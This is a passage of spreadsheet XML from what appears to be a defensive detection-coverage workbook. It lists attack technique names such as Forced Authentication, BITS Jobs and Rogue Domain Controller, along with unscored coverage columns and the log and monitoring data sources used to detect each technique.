      <c r="K178" s="46" t="str">
        <f>LOOKUP(A178,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,File monitoring,Process use of network,Process monitoring,Browser extensions</v>
      </c>
    </row>
    <row r="179" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A179" s="43" t="s">
        <v>294</v>
      </c>
      <c r="B179" s="41" t="str">
        <f>LOOKUP(A179,'REF-DataSources'!A:B)</f>
        <v>Browser Extensions</v>
      </c>
      <c r="C179" s="45"/>
      <c r="D179" s="45"/>
      <c r="E179" s="45"/>
      <c r="F179" s="14">
        <v>0</v>
      </c>
      <c r="G179" s="14">
        <v>0</v>
      </c>
      <c r="H179" s="14">
        <v>0</v>
      </c>
      <c r="I179" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K179" s="46" t="str">
        <f>LOOKUP(A179,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,File monitoring,Process use of network,Process monitoring,Browser extensions</v>
      </c>
    </row>
    <row r="180" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A180" s="43" t="s">
        <v>295</v>
      </c>
      <c r="B180" s="41" t="str">
        <f>LOOKUP(A180,'REF-DataSources'!A:B)</f>
        <v>Browser Extensions</v>
      </c>
      <c r="C180" s="45"/>
      <c r="D180" s="45"/>
      <c r="E180" s="45"/>
      <c r="F180" s="14">
        <v>0</v>
      </c>
      <c r="G180" s="14">
        <v>0</v>
      </c>
      <c r="H180" s="14">
        <v>0</v>
      </c>
      <c r="I180" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K180" s="46" t="str">
        <f>LOOKUP(A180,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,File monitoring,Process use of network,Process monitoring,Browser extensions</v>
      </c>
    </row>
    <row r="181" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A181" s="43" t="s">
        <v>297</v>
      </c>
      <c r="B181" s="41" t="str">
        <f>LOOKUP(A181,'REF-DataSources'!A:B)</f>
        <v>Browser Extensions</v>
      </c>
      <c r="C181" s="45"/>
      <c r="D181" s="45"/>
      <c r="E181" s="45"/>
      <c r="F181" s="14">
        <v>0</v>
      </c>
      <c r="G181" s="14">
        <v>0</v>
      </c>
      <c r="H181" s="14">
        <v>0</v>
      </c>
      <c r="I181" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K181" s="46" t="str">
        <f>LOOKUP(A181,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,File monitoring,Process use of network,Process monitoring,Browser extensions</v>
      </c>
    </row>
    <row r="182" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A182" s="43" t="s">
        <v>298</v>
      </c>
      <c r="B182" s="41" t="str">
        <f>LOOKUP(A182,'REF-DataSources'!A:B)</f>
        <v>Browser Extensions</v>
      </c>
      <c r="C182" s="45"/>
      <c r="D182" s="45"/>
      <c r="E182" s="45"/>
      <c r="F182" s="14">
        <v>0</v>
      </c>
      <c r="G182" s="14">
        <v>0</v>
      </c>
      <c r="H182" s="14">
        <v>0</v>
      </c>
      <c r="I182" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K182" s="46" t="str">
        <f>LOOKUP(A182,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,File monitoring,Process use of network,Process monitoring,Browser extensions</v>
      </c>
    </row>
    <row r="183" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A183" s="43" t="s">
        <v>299</v>
      </c>
      <c r="B183" s="41" t="str">
        <f>LOOKUP(A183,'REF-DataSources'!A:B)</f>
        <v>Browser Extensions</v>
      </c>
      <c r="C183" s="45"/>
      <c r="D183" s="45"/>
      <c r="E183" s="45"/>
      <c r="F183" s="14">
        <v>0</v>
      </c>
      <c r="G183" s="14">
        <v>0</v>
      </c>
      <c r="H183" s="14">
        <v>0</v>
      </c>
      <c r="I183" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K183" s="46" t="str">
        <f>LOOKUP(A183,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,File monitoring,Process use of network,Process monitoring,Browser extensions</v>
      </c>
    </row>
    <row r="184" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A184" s="43" t="s">
        <v>300</v>
      </c>
      <c r="B184" s="41" t="str">
        <f>LOOKUP(A184,'REF-DataSources'!A:B)</f>
        <v>Browser Extensions</v>
      </c>
      <c r="C184" s="45"/>
      <c r="D184" s="45"/>
      <c r="E184" s="45"/>
      <c r="F184" s="14">
        <v>0</v>
      </c>
      <c r="G184" s="14">
        <v>0</v>
      </c>
      <c r="H184" s="14">
        <v>0</v>
      </c>
      <c r="I184" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K184" s="46" t="str">
        <f>LOOKUP(A184,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,File monitoring,Process use of network,Process monitoring,Browser extensions</v>
      </c>
    </row>
    <row r="185" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A185" s="43" t="s">
        <v>301</v>
      </c>
      <c r="B185" s="41" t="str">
        <f>LOOKUP(A185,'REF-DataSources'!A:B)</f>
        <v>Browser Extensions</v>
      </c>
      <c r="C185" s="45"/>
      <c r="D185" s="45"/>
      <c r="E185" s="45"/>
      <c r="F185" s="14">
        <v>0</v>
      </c>
      <c r="G185" s="14">
        <v>0</v>
      </c>
      <c r="H185" s="14">
        <v>0</v>
      </c>
      <c r="I185" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K185" s="46" t="str">
        <f>LOOKUP(A185,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,File monitoring,Process use of network,Process monitoring,Browser extensions</v>
      </c>
    </row>
    <row r="186" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A186" s="43" t="s">
        <v>302</v>
      </c>
      <c r="B186" s="41" t="str">
        <f>LOOKUP(A186,'REF-DataSources'!A:B)</f>
        <v>Man in the Browser</v>
      </c>
      <c r="C186" s="45"/>
      <c r="D186" s="45"/>
      <c r="E186" s="45"/>
      <c r="F186" s="14">
        <v>0</v>
      </c>
      <c r="G186" s="14">
        <v>0</v>
      </c>
      <c r="H186" s="14">
        <v>0</v>
      </c>
      <c r="I186" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K186" s="46" t="str">
        <f>LOOKUP(A186,'REF-DataSources'!A:C)</f>
        <v>Authentication logs,Packet capture,Process monitoring,API monitoring</v>
      </c>
    </row>
    <row r="187" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A187" s="43" t="s">
        <v>304</v>
      </c>
      <c r="B187" s="41" t="str">
        <f>LOOKUP(A187,'REF-DataSources'!A:B)</f>
        <v>Man in the Browser</v>
      </c>
      <c r="C187" s="45"/>
      <c r="D187" s="45"/>
      <c r="E187" s="45"/>
      <c r="F187" s="14">
        <v>0</v>
      </c>
      <c r="G187" s="14">
        <v>0</v>
      </c>
      <c r="H187" s="14">
        <v>0</v>
      </c>
      <c r="I187" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K187" s="46" t="str">
        <f>LOOKUP(A187,'REF-DataSources'!A:C)</f>
        <v>Authentication logs,Packet capture,Process monitoring,API monitoring</v>
      </c>
    </row>
    <row r="188" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A188" s="43" t="s">
        <v>305</v>
      </c>
      <c r="B188" s="41" t="str">
        <f>LOOKUP(A188,'REF-DataSources'!A:B)</f>
        <v>Forced Authentication</v>
      </c>
      <c r="C188" s="45"/>
      <c r="D188" s="45"/>
      <c r="E188" s="45"/>
      <c r="F188" s="14">
        <v>0</v>
      </c>
      <c r="G188" s="14">
        <v>0</v>
      </c>
      <c r="H188" s="14">
        <v>0</v>
      </c>
      <c r="I188" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K188" s="46" t="str">
        <f>LOOKUP(A188,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Network protocol analysis,Network device logs,Process use of network</v>
      </c>
    </row>
    <row r="189" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A189" s="43" t="s">
        <v>307</v>
      </c>
      <c r="B189" s="41" t="str">
        <f>LOOKUP(A189,'REF-DataSources'!A:B)</f>
        <v>Forced Authentication</v>
      </c>
      <c r="C189" s="45"/>
      <c r="D189" s="45"/>
      <c r="E189" s="45"/>
      <c r="F189" s="14">
        <v>0</v>
      </c>
      <c r="G189" s="14">
        <v>0</v>
      </c>
      <c r="H189" s="14">
        <v>0</v>
      </c>
      <c r="I189" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K189" s="46" t="str">
        <f>LOOKUP(A189,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Network protocol analysis,Network device logs,Process use of network</v>
      </c>
    </row>
    <row r="190" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A190" s="43" t="s">
        <v>308</v>
      </c>
      <c r="B190" s="41" t="str">
        <f>LOOKUP(A190,'REF-DataSources'!A:B)</f>
        <v>Drive-by Compromise</v>
      </c>
      <c r="C190" s="45"/>
      <c r="D190" s="45"/>
      <c r="E190" s="45"/>
      <c r="F190" s="14">
        <v>0</v>
      </c>
      <c r="G190" s="14">
        <v>0</v>
      </c>
      <c r="H190" s="14">
        <v>0</v>
      </c>
      <c r="I190" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K190" s="46" t="str">
        <f>LOOKUP(A190,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Network device logs,Process use of network,Web proxy,Network intrusion detection system,SSL/TLS inspection</v>
      </c>
    </row>
    <row r="191" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A191" s="43" t="s">
        <v>310</v>
      </c>
      <c r="B191" s="41" t="str">
        <f>LOOKUP(A191,'REF-DataSources'!A:B)</f>
        <v>Exploit Public-Facing Application</v>
      </c>
      <c r="C191" s="45"/>
      <c r="D191" s="45"/>
      <c r="E191" s="45"/>
      <c r="F191" s="14">
        <v>0</v>
      </c>
      <c r="G191" s="14">
        <v>0</v>
      </c>
      <c r="H191" s="14">
        <v>0</v>
      </c>
      <c r="I191" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K191" s="46" t="str">
        <f>LOOKUP(A191,'REF-DataSources'!A:C)</f>
        <v>Azure activity logs,AWS CloudTrail logs,Stackdriver logs,Packet capture,Web logs,Web application firewall logs,Application logs</v>
      </c>
    </row>
    <row r="192" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A192" s="43" t="s">
        <v>311</v>
      </c>
      <c r="B192" s="41" t="str">
        <f>LOOKUP(A192,'REF-DataSources'!A:B)</f>
        <v>Exploit Public-Facing Application</v>
      </c>
      <c r="C192" s="45"/>
      <c r="D192" s="45"/>
      <c r="E192" s="45"/>
      <c r="F192" s="14">
        <v>0</v>
      </c>
      <c r="G192" s="14">
        <v>0</v>
      </c>
      <c r="H192" s="14">
        <v>0</v>
      </c>
      <c r="I192" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K192" s="46" t="str">
        <f>LOOKUP(A192,'REF-DataSources'!A:C)</f>
        <v>Azure activity logs,AWS CloudTrail logs,Stackdriver logs,Packet capture,Web logs,Web application firewall logs,Application logs</v>
      </c>
    </row>
    <row r="193" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A193" s="43" t="s">
        <v>313</v>
      </c>
      <c r="B193" s="41" t="str">
        <f>LOOKUP(A193,'REF-DataSources'!A:B)</f>
        <v>Exploit Public-Facing Application</v>
      </c>
      <c r="C193" s="45"/>
      <c r="D193" s="45"/>
      <c r="E193" s="45"/>
      <c r="F193" s="14">
        <v>0</v>
      </c>
      <c r="G193" s="14">
        <v>0</v>
      </c>
      <c r="H193" s="14">
        <v>0</v>
      </c>
      <c r="I193" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K193" s="46" t="str">
        <f>LOOKUP(A193,'REF-DataSources'!A:C)</f>
        <v>Azure activity logs,AWS CloudTrail logs,Stackdriver logs,Packet capture,Web logs,Web application firewall logs,Application logs</v>
      </c>
    </row>
    <row r="194" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A194" s="43" t="s">
        <v>315</v>
      </c>
      <c r="B194" s="41" t="str">
        <f>LOOKUP(A194,'REF-DataSources'!A:B)</f>
        <v>Exploit Public-Facing Application</v>
      </c>
      <c r="C194" s="45"/>
      <c r="D194" s="45"/>
      <c r="E194" s="45"/>
      <c r="F194" s="14">
        <v>0</v>
      </c>
      <c r="G194" s="14">
        <v>0</v>
      </c>
      <c r="H194" s="14">
        <v>0</v>
      </c>
      <c r="I194" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K194" s="46" t="str">
        <f>LOOKUP(A194,'REF-DataSources'!A:C)</f>
        <v>Azure activity logs,AWS CloudTrail logs,Stackdriver logs,Packet capture,Web logs,Web application firewall logs,Application logs</v>
      </c>
    </row>
    <row r="195" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A195" s="43" t="s">
        <v>317</v>
      </c>
      <c r="B195" s="41" t="str">
        <f>LOOKUP(A195,'REF-DataSources'!A:B)</f>
        <v>Exploit Public-Facing Application</v>
      </c>
      <c r="C195" s="45"/>
      <c r="D195" s="45"/>
      <c r="E195" s="45"/>
      <c r="F195" s="14">
        <v>0</v>
      </c>
      <c r="G195" s="14">
        <v>0</v>
      </c>
      <c r="H195" s="14">
        <v>0</v>
      </c>
      <c r="I195" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K195" s="46" t="str">
        <f>LOOKUP(A195,'REF-DataSources'!A:C)</f>
        <v>Azure activity logs,AWS CloudTrail logs,Stackdriver logs,Packet capture,Web logs,Web application firewall logs,Application logs</v>
      </c>
    </row>
    <row r="196" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A196" s="43" t="s">
        <v>318</v>
      </c>
      <c r="B196" s="41" t="str">
        <f>LOOKUP(A196,'REF-DataSources'!A:B)</f>
        <v>Supply Chain Compromise</v>
      </c>
      <c r="C196" s="45"/>
      <c r="D196" s="45"/>
      <c r="E196" s="45"/>
      <c r="F196" s="14">
        <v>0</v>
      </c>
      <c r="G196" s="14">
        <v>0</v>
      </c>
      <c r="H196" s="14">
        <v>0</v>
      </c>
      <c r="I196" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K196" s="46" t="str">
        <f>LOOKUP(A196,'REF-DataSources'!A:C)</f>
        <v>Web proxy,File monitoring</v>
      </c>
    </row>
    <row r="197" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A197" s="43" t="s">
        <v>319</v>
      </c>
      <c r="B197" s="41" t="str">
        <f>LOOKUP(A197,'REF-DataSources'!A:B)</f>
        <v>Compromise Hardware Supply Chain</v>
      </c>
      <c r="C197" s="45"/>
      <c r="D197" s="45"/>
      <c r="E197" s="45"/>
      <c r="F197" s="14">
        <v>0</v>
      </c>
      <c r="G197" s="14">
        <v>0</v>
      </c>
      <c r="H197" s="14">
        <v>0</v>
      </c>
      <c r="I197" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K197" s="46" t="str">
        <f>LOOKUP(A197,'REF-DataSources'!A:C)</f>
        <v>Component firmware,BIOS,Disk forensics,EFI</v>
      </c>
    </row>
    <row r="198" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A198" s="43" t="s">
        <v>321</v>
      </c>
      <c r="B198" s="41" t="str">
        <f>LOOKUP(A198,'REF-DataSources'!A:B)</f>
        <v>BITS Jobs</v>
      </c>
      <c r="C198" s="45"/>
      <c r="D198" s="45"/>
      <c r="E198" s="45"/>
      <c r="F198" s="14">
        <v>0</v>
      </c>
      <c r="G198" s="14">
        <v>0</v>
      </c>
      <c r="H198" s="14">
        <v>0</v>
      </c>
      <c r="I198" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K198" s="46" t="str">
        <f>LOOKUP(A198,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters,Packet capture,Windows event logs</v>
      </c>
    </row>
    <row r="199" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A199" s="43" t="s">
        <v>322</v>
      </c>
      <c r="B199" s="41" t="str">
        <f>LOOKUP(A199,'REF-DataSources'!A:B)</f>
        <v>BITS Jobs</v>
      </c>
      <c r="C199" s="45"/>
      <c r="D199" s="45"/>
      <c r="E199" s="45"/>
      <c r="F199" s="14">
        <v>0</v>
      </c>
      <c r="G199" s="14">
        <v>0</v>
      </c>
      <c r="H199" s="14">
        <v>0</v>
      </c>
      <c r="I199" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K199" s="46" t="str">
        <f>LOOKUP(A199,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters,Packet capture,Windows event logs</v>
      </c>
    </row>
    <row r="200" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A200" s="43" t="s">
        <v>323</v>
      </c>
      <c r="B200" s="41" t="str">
        <f>LOOKUP(A200,'REF-DataSources'!A:B)</f>
        <v>Trusted Relationship</v>
      </c>
      <c r="C200" s="45"/>
      <c r="D200" s="45"/>
      <c r="E200" s="45"/>
      <c r="F200" s="14">
        <v>0</v>
      </c>
      <c r="G200" s="14">
        <v>0</v>
      </c>
      <c r="H200" s="14">
        <v>0</v>
      </c>
      <c r="I200" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K200" s="46" t="str">
        <f>LOOKUP(A200,'REF-DataSources'!A:C)</f>
        <v>Azure activity logs,Stackdriver logs,AWS CloudTrail logs,Application logs,Authentication logs,Third-party application logs</v>
      </c>
    </row>
    <row r="201" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A201" s="43" t="s">
        <v>324</v>
      </c>
      <c r="B201" s="41" t="str">
        <f>LOOKUP(A201,'REF-DataSources'!A:B)</f>
        <v>Hardware Additions</v>
      </c>
      <c r="C201" s="45"/>
      <c r="D201" s="45"/>
      <c r="E201" s="45"/>
      <c r="F201" s="14">
        <v>0</v>
      </c>
      <c r="G201" s="14">
        <v>0</v>
      </c>
      <c r="H201" s="14">
        <v>0</v>
      </c>
      <c r="I201" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K201" s="46" t="str">
        <f>LOOKUP(A201,'REF-DataSources'!A:C)</f>
        <v>Asset management,Data loss prevention</v>
      </c>
    </row>
    <row r="202" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A202" s="43" t="s">
        <v>325</v>
      </c>
      <c r="B202" s="41" t="str">
        <f>LOOKUP(A202,'REF-DataSources'!A:B)</f>
        <v>Password Policy Discovery</v>
      </c>
      <c r="C202" s="45"/>
      <c r="D202" s="45"/>
      <c r="E202" s="45"/>
      <c r="F202" s="14">
        <v>0</v>
      </c>
      <c r="G202" s="14">
        <v>0</v>
      </c>
      <c r="H202" s="14">
        <v>0</v>
      </c>
      <c r="I202" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K202" s="46" t="str">
        <f>LOOKUP(A202,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Process monitoring</v>
      </c>
    </row>
    <row r="203" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A203" s="43" t="s">
        <v>326</v>
      </c>
      <c r="B203" s="41" t="str">
        <f>LOOKUP(A203,'REF-DataSources'!A:B)</f>
        <v>Indirect Command Execution</v>
      </c>
      <c r="C203" s="45"/>
      <c r="D203" s="45"/>
      <c r="E203" s="45"/>
      <c r="F203" s="14">
        <v>0</v>
      </c>
      <c r="G203" s="14">
        <v>0</v>
      </c>
      <c r="H203" s="14">
        <v>0</v>
      </c>
      <c r="I203" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K203" s="46" t="str">
        <f>LOOKUP(A203,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters,Windows event logs</v>
      </c>
    </row>
    <row r="204" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A204" s="43" t="s">
        <v>327</v>
      </c>
      <c r="B204" s="41" t="str">
        <f>LOOKUP(A204,'REF-DataSources'!A:B)</f>
        <v>Exploitation for Client Execution</v>
      </c>
      <c r="C204" s="45"/>
      <c r="D204" s="45"/>
      <c r="E204" s="45"/>
      <c r="F204" s="14">
        <v>0</v>
      </c>
      <c r="G204" s="14">
        <v>0</v>
      </c>
      <c r="H204" s="14">
        <v>0</v>
      </c>
      <c r="I204" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K204" s="46" t="str">
        <f>LOOKUP(A204,'REF-DataSources'!A:C)</f>
        <v>Anti-virus,System calls,Process monitoring</v>
      </c>
    </row>
    <row r="205" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A205" s="43" t="s">
        <v>328</v>
      </c>
      <c r="B205" s="41" t="str">
        <f>LOOKUP(A205,'REF-DataSources'!A:B)</f>
        <v>User Execution</v>
      </c>
      <c r="C205" s="45"/>
      <c r="D205" s="45"/>
      <c r="E205" s="45"/>
      <c r="F205" s="14">
        <v>0</v>
      </c>
      <c r="G205" s="14">
        <v>0</v>
      </c>
      <c r="H205" s="14">
        <v>0</v>
      </c>
      <c r="I205" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K205" s="46" t="str">
        <f>LOOKUP(A205,'REF-DataSources'!A:C)</f>
        <v>Anti-virus,Process command-line parameters,Process monitoring</v>
      </c>
    </row>
    <row r="206" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A206" s="43" t="s">
        <v>329</v>
      </c>
      <c r="B206" s="41" t="str">
        <f>LOOKUP(A206,'REF-DataSources'!A:B)</f>
        <v>Traffic Signaling</v>
      </c>
      <c r="C206" s="45"/>
      <c r="D206" s="45"/>
      <c r="E206" s="45"/>
      <c r="F206" s="14">
        <v>0</v>
      </c>
      <c r="G206" s="14">
        <v>0</v>
      </c>
      <c r="H206" s="14">
        <v>0</v>
      </c>
      <c r="I206" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K206" s="46" t="str">
        <f>LOOKUP(A206,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Netflow/Enclave netflow</v>
      </c>
    </row>
    <row r="207" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A207" s="43" t="s">
        <v>330</v>
      </c>
      <c r="B207" s="41" t="str">
        <f>LOOKUP(A207,'REF-DataSources'!A:B)</f>
        <v>Port Knocking</v>
      </c>
      <c r="C207" s="45"/>
      <c r="D207" s="45"/>
      <c r="E207" s="45"/>
      <c r="F207" s="14">
        <v>0</v>
      </c>
      <c r="G207" s="14">
        <v>0</v>
      </c>
      <c r="H207" s="14">
        <v>0</v>
      </c>
      <c r="I207" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K207" s="46" t="str">
        <f>LOOKUP(A207,'REF-DataSources'!A:C)</f>
        <v>Netflow/Enclave netflow,Packet capture</v>
      </c>
    </row>
    <row r="208" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A208" s="43" t="s">
        <v>331</v>
      </c>
      <c r="B208" s="41" t="str">
        <f>LOOKUP(A208,'REF-DataSources'!A:B)</f>
        <v>Rogue Domain Controller</v>
      </c>
      <c r="C208" s="45"/>
      <c r="D208" s="45"/>
      <c r="E208" s="45"/>
      <c r="F208" s="14">
        <v>0</v>
      </c>
      <c r="G208" s="14">
        <v>0</v>
      </c>
      <c r="H208" s="14">
        <v>0</v>
      </c>
      <c r="I208" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K208" s="46" t="str">
        <f>LOOKUP(A208,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Authentication logs,Network protocol analysis,Packet capture</v>
      </c>
    </row>
    <row r="209" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A209" s="43" t="s">
        <v>333</v>
      </c>
      <c r="B209" s="41" t="str">
        <f>LOOKUP(A209,'REF-DataSources'!A:B)</f>
        <v>Rogue Domain Controller</v>
      </c>
      <c r="C209" s="45"/>
      <c r="D209" s="45"/>
      <c r="E209" s="45"/>
      <c r="F209" s="14">
        <v>0</v>
      </c>
      <c r="G209" s="14">
        <v>0</v>
      </c>
      <c r="H209" s="14">
        <v>0</v>
      </c>
      <c r="I209" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K209" s="46" t="str">
        <f>LOOKUP(A209,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Authentication logs,Network protocol analysis,Packet capture</v>
      </c>
    </row>
    <row r="210" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A210" s="43" t="s">
        <v>334</v>
      </c>
      <c r="B210" s="41" t="str">
        <f>LOOKUP(A210,'REF-DataSources'!A:B)</f>
        <v>Rogue Domain Controller</v>
      </c>
      <c r="C210" s="45"/>
      <c r="D210" s="45"/>
      <c r="E210" s="45"/>
      <c r="F210" s="14">
        <v>0</v>
      </c>
      <c r="G210" s="14">
        <v>0</v>
      </c>
      <c r="H210" s="14">
        <v>0</v>
      </c>
      <c r="I210" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K210" s="46" t="str">
        <f>LOOKUP(A210,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Authentication logs,Network protocol analysis,Packet capture</v>
      </c>
    </row>
    <row r="211" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A211" s="43" t="s">
        <v>336</v>
      </c>
      <c r="B211" s="41" t="str">
        <f>LOOKUP(A211,'REF-DataSources'!A:B)</f>
        <v>Exploitation of Remote Services</v>
      </c>
      <c r="C211" s="45"/>
      <c r="D211" s="45"/>
      <c r="E211" s="45"/>
      <c r="F211" s="14">
        <v>0</v>
      </c>
      <c r="G211" s="14">
        <v>0</v>
      </c>
      <c r="H211" s="14">
        <v>0</v>
      </c>
      <c r="I211" s="32">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="K211" s="46" t="str">
        <f>LOOKUP(A211,'REF-DataSources'!A:C)</f>
        <v>Windows Error Reporting,Process monitoring,File monitoring</v>
      </c>
    </row>
    <row r="212" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A212" s="43" t="s">
        <v>337</v>
      </c>
      <c r="B212" s="41" t="str">
        <f>LOOKUP(A212,'REF-DataSources'!A:B)</f>
        <v>Exploitation for Defense Evasion</v>
      </c>
      <c r="C212" s="45"/>
      <c r="D212" s="45"/>
      <c r="E212" s="45"/>
      <c r="F212" s="14">
        <v>0</v>
      </c>
      <c r="G212" s="14">
        <v>0</v>
      </c>
      <c r="H212" s="14">
        <v>0</v>
      </c>
      <c r="I212" s="32">
        <f t="shared" ref="I212:I245" si="5">((F212*2)+G212+(H212*2))/5</f>
        <v>0</v>
      </c>
      <c r="K212" s="46" t="str">
        <f>LOOKUP(A212,'REF-DataSources'!A:C)</f>
        <v>Windows Error Reporting,Process monitoring,File monitoring</v>
      </c>
    </row>
    <row r="213" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A213" s="43" t="s">
        <v>338</v>
      </c>
      <c r="B213" s="41" t="str">
        <f>LOOKUP(A213,'REF-DataSources'!A:B)</f>
        <v>Exploitation for Credential Access</v>
      </c>
      <c r="C213" s="45"/>
      <c r="D213" s="45"/>
      <c r="E213" s="45"/>
      <c r="F213" s="14">
        <v>0</v>
      </c>
      <c r="G213" s="14">
        <v>0</v>
      </c>
      <c r="H213" s="14">
        <v>0</v>
      </c>
      <c r="I213" s="32">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="K213" s="46" t="str">
        <f>LOOKUP(A213,'REF-DataSources'!A:C)</f>
        <v>Authentication logs,Windows Error Reporting,Process monitoring</v>
      </c>
    </row>
    <row r="214" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A214" s="43" t="s">
        <v>339</v>
      </c>
      <c r="B214" s="41" t="str">
        <f>LOOKUP(A214,'REF-DataSources'!A:B)</f>
        <v>Data from Information Repositories</v>
      </c>
      <c r="C214" s="45"/>
      <c r="D214" s="45"/>
      <c r="E214" s="45"/>
      <c r="F214" s="14">
        <v>0</v>
      </c>
      <c r="G214" s="14">
        <v>0</v>
      </c>
      <c r="H214" s="14">
        <v>0</v>
      </c>
      <c r="I214" s="32">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="K214" s="46" t="str">
        <f>LOOKUP(A214,'REF-DataSources'!A:C)</f>
        <v>OAuth audit logs,Application logs,Authentication logs,Data loss prevention,Third-party application logs</v>
      </c>
    </row>
    <row r="215" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A215" s="43" t="s">
        <v>340</v>
      </c>
      <c r="B215" s="41" t="str">
        <f>LOOKUP(A215,'REF-DataSources'!A:B)</f>
        <v>Sharepoint</v>
      </c>
      <c r="C215" s="45"/>
      <c r="D215" s="45"/>
      <c r="E215" s="45"/>
      <c r="F215" s="14">
        <v>0</v>
      </c>
      <c r="G215" s="14">
        <v>0</v>
      </c>
      <c r="H215" s="14">
        <v>0</v>
      </c>
      <c r="I215" s="32">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="K215" s="46" t="str">
        <f>LOOKUP(A215,'REF-DataSources'!A:C)</f>
        <v>Office 365 audit logs,Authentication logs,Application logs</v>
      </c>
    </row>
    <row r="216" spans="1:11" x14ac:dyDescent="0.2">
      <c r="A216" s="43" t="s">
        <v>341</v>
      </c>
      <c r="B216" s="41" t="str">
        <f>LOOKUP(A216,'REF-DataSources'!A:B)</f>
        <v>Sharepoint</v>
      </c>
      <c r="C216" s="45"/>
      <c r="D216" s="45"/>
      <c r="E216" s="45"/>
      <c r="F216" s="14">
